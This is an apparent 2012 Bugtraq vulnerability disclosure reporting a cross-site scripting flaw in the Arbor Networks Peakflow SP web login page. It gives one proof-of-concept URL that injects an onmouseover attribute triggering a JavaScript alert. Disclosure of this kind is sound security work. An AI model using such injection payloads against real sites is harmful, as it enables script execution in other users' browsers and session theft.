
Date: Tue, 3 Apr 2012 15:27:33 -0400 (EDT)
From: b.saleh@....com
To: bugtraq@...urityfocus.com
Subject: Arbor Networks Peakflow SP web interface XSS

# Exploit Title: Arbor Networks Peakflow SP XSS
# Date: 03 April 2012
# Software Link: www.arbornetworks.com/peakflowsp
================================================================
- Login Page vulnerable to cross site scripting ("XSS")

https://127.0.0.2/index/"onmouseover="alert(666);
================================================================
